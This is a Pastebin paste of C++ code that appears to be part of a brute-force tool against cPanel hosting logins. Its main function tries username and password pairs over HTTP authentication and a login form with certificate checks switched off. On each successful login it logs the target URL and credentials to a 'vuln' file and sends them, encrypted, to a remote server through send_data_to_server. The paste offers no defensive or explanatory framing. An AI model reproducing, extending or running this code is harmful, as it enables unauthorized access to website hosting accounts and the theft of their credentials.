API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 25th, 2018
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 8.30 KB | None | 0 0
raw download clone embed print report
  1. extern char *mode;
  2.  
  3. void delete_cookie_file(int id_comb)
  4. {
  5.     char file_to_delete[100];
  6.     memset(file_to_delete,0,sizeof(file_to_delete));
  7.     sprintf(file_to_delete,"cookies/cookie_%d.txt",id_comb);
  8.    
  9.     if(remove(file_to_delete) != 0)
  10.     {
  11.         // perror( "Error deleting file" );
  12.     }
  13.     else
  14.     {
  15.         // puts( "File successfully deleted" );
  16.     }
  17. }
  18.  
  19. void create_cookie(int id_comb)
  20. {
  21.     char create_command[500];
  22.     memset(create_command,0,sizeof(create_command));
  23.     sprintf(create_command,"touch cookies/cookie_%d.txt; chmod 777 cookies/cookie_%d.txt; ",id_comb,id_comb,id_comb);
  24.     system(create_command);
  25. }
  26.  
  27. char* get_cookie_filename_by_id(int id_comb)
  28. {
  29.     char temp_cookie[100];
  30.     memset(temp_cookie,0,sizeof(temp_cookie));
  31.     sprintf(temp_cookie,"cookies/cookie_%d.txt",id_comb);
  32.    
  33.     return strdup(temp_cookie);
  34. }
  35.  
  36.  
  37. int curl_cpanel_brute(char* url, char* user, char* pass, int debug_curl, int id_comb)
  38. {
  39.     delete_cookie_file(id_comb);
  40.     create_cookie(id_comb);
  41.    
  42.     char *cookie_path;
  43.     cookie_path = realpath(get_cookie_filename_by_id(id_comb), NULL);
  44.  
  45.     int result = 0;
  46.     CURL *curl_handle;
  47.     CURLcode res;
  48.  
  49.     struct MemoryStruct chunk;
  50.     char* curl_error;
  51.     struct curl_slist *chunk_headers = NULL;
  52.    
  53.     curl_global_init(CURL_GLOBAL_ALL);
  54.     chunk.memory = (char*) malloc(1);
  55.     chunk.size = 0;
  56.    
  57.     // CURL1
  58.     curl_handle = curl_easy_init();
  59.     curl_easy_setopt(curl_handle, CURLOPT_URL, url);
  60.     curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
  61.    
  62.     curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
  63.     curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
  64.    
  65.     curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
  66.     curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
  67.  
  68.     // curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT_CURL);
  69.     curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,"");
  70.     // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
  71.    
  72.     curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
  73.    
  74.     curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
  75.     curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
  76.     // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
  77.     // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
  78.     // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST,"RC4-SHA");
  79.     // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1.2");
  80.    
  81.    
  82.     curl_easy_setopt(curl_handle, CURLOPT_COOKIEJAR,cookie_path);
  83.     curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE,cookie_path);
  84.    
  85.     if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
  86.    
  87.     // curl_easy_setopt(curl_handle, CURLOPT_FAILONERROR, 1L);
  88.     // curl_easy_setopt(curl_handle, CURLOPT_UPLOAD, 1L);
  89.     char user_pass[500];
  90.     memset(user_pass,0,sizeof(user_pass));
  91.     sprintf(user_pass,"%s:%s",user,pass);
  92.    
  93.     curl_easy_setopt(curl_handle, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  94.     curl_easy_setopt(curl_handle, CURLOPT_USERPWD,user_pass);
  95.    
  96.     res = curl_easy_perform(curl_handle);
  97.  
  98.     if(res != CURLE_OK)
  99.     {
  100.         curl_error = (char*) curl_easy_strerror(res);
  101.  
  102.         if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
  103.     }
  104.     else
  105.     {    
  106.         if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
  107.        
  108.         if(debug_curl >=3) puts(chunk.memory);
  109.        
  110.         if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"<title>cPanel -"))
  111.         {
  112.             result = 1;
  113.  
  114.             char temp_filename_line[500];
  115.             memset(temp_filename_line,0,500);
  116.             sprintf(temp_filename_line,"%s | %s:%s | %s\n",url,user,pass,mode);
  117.             if(debug_level >= 1) file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
  118.            
  119.             send_data_to_server(encrypt(temp_filename_line));
  120.         }
  121.        
  122.        
  123.         else if(strstr(chunk.memory,"name=\"user\"") && strstr(chunk.memory,"name=\"pass\""))
  124.         {
  125.             // it is a box, post it
  126.             curl_easy_setopt(curl_handle, CURLOPT_URL, url);
  127.             curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
  128.            
  129.             curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
  130.             curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
  131.            
  132.             curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
  133.             curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
  134.  
  135.             //curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT_CURL);
  136.             curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,"");
  137.             // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
  138.            
  139.             curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
  140.            
  141.             curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
  142.             curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
  143.             // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
  144.             // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
  145.             // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1.2");
  146.            
  147.             curl_easy_setopt(curl_handle, CURLOPT_COOKIEJAR,cookie_path);
  148.             curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE,cookie_path);
  149.            
  150.             char post_string[500];
  151.             memset(post_string,0,500);
  152.             sprintf(post_string,"user=%s&pass=%s",user,pass);
  153.            
  154.             curl_easy_setopt(curl_handle,CURLOPT_POSTFIELDS,post_string);
  155.            
  156.             if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
  157.            
  158.             res = curl_easy_perform(curl_handle);
  159.  
  160.             if(res != CURLE_OK)
  161.             {
  162.                 curl_error = (char*) curl_easy_strerror(res);
  163.  
  164.                 if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
  165.                
  166.                 // visit it once more if ssl
  167.                 if(strstr(url,"https://") || strstr(url,":443"))
  168.                 {
  169.                     curl_easy_setopt(curl_handle, CURLOPT_URL, url);
  170.                     curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
  171.                    
  172.                     curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
  173.                     curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
  174.                    
  175.                     curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
  176.                     curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
  177.  
  178.                     // curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT_CURL);
  179.                     curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,"");
  180.                     // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
  181.                    
  182.                     curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
  183.                    
  184.                     curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
  185.                     curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
  186.                     // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
  187.                     // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
  188.                     // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1.2");
  189.  
  190.                     curl_easy_setopt(curl_handle, CURLOPT_COOKIEJAR,cookie_path);
  191.                     curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE,cookie_path);
  192.  
  193.                     if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
  194.                    
  195.                     res = curl_easy_perform(curl_handle);
  196.  
  197.                     if(res != CURLE_OK)
  198.                     {
  199.                         curl_error = (char*) curl_easy_strerror(res);
  200.  
  201.                         if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
  202.                     }
  203.                     else
  204.                     {    
  205.                         if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
  206.                        
  207.                         if(debug_curl >=3) puts(chunk.memory);         
  208.                     }
  209.                    
  210.                     if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"<title>cPanel -"))
  211.                     {
  212.                         result = 1;
  213.                        
  214.                         char temp_filename_line[500];
  215.                         memset(temp_filename_line,0,500);
  216.                         sprintf(temp_filename_line,"%s | %s:%s | %s\n",url,user,pass,mode);
  217.                         if(debug_level >= 1) file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
  218.                        
  219.                         send_data_to_server(encrypt(temp_filename_line));
  220.                     }
  221.                 }
  222.             }
  223.             else
  224.             {    
  225.                 if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
  226.                
  227.                 if(debug_curl >=3) puts(chunk.memory);
  228.                
  229.                 if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"<title>cPanel -"))
  230.                 {
  231.                     result = 1;
  232.                    
  233.                     char temp_filename_line[500];
  234.                     memset(temp_filename_line,0,500);
  235.                     sprintf(temp_filename_line,"%s | %s:%s | %s\n",url,user,pass,mode);
  236.                     if(debug_level >= 1) file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
  237.                    
  238.                     send_data_to_server(encrypt(temp_filename_line));
  239.                 }
  240.             }
  241.         }
  242.     }
  243.    
  244.     curl_easy_cleanup(curl_handle);
  245.  
  246.     free(chunk.memory);
  247.  
  248.     curl_global_cleanup();
  249.    
  250.     delete_cookie_file(id_comb);
  251.    
  252.     return result;
  253. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!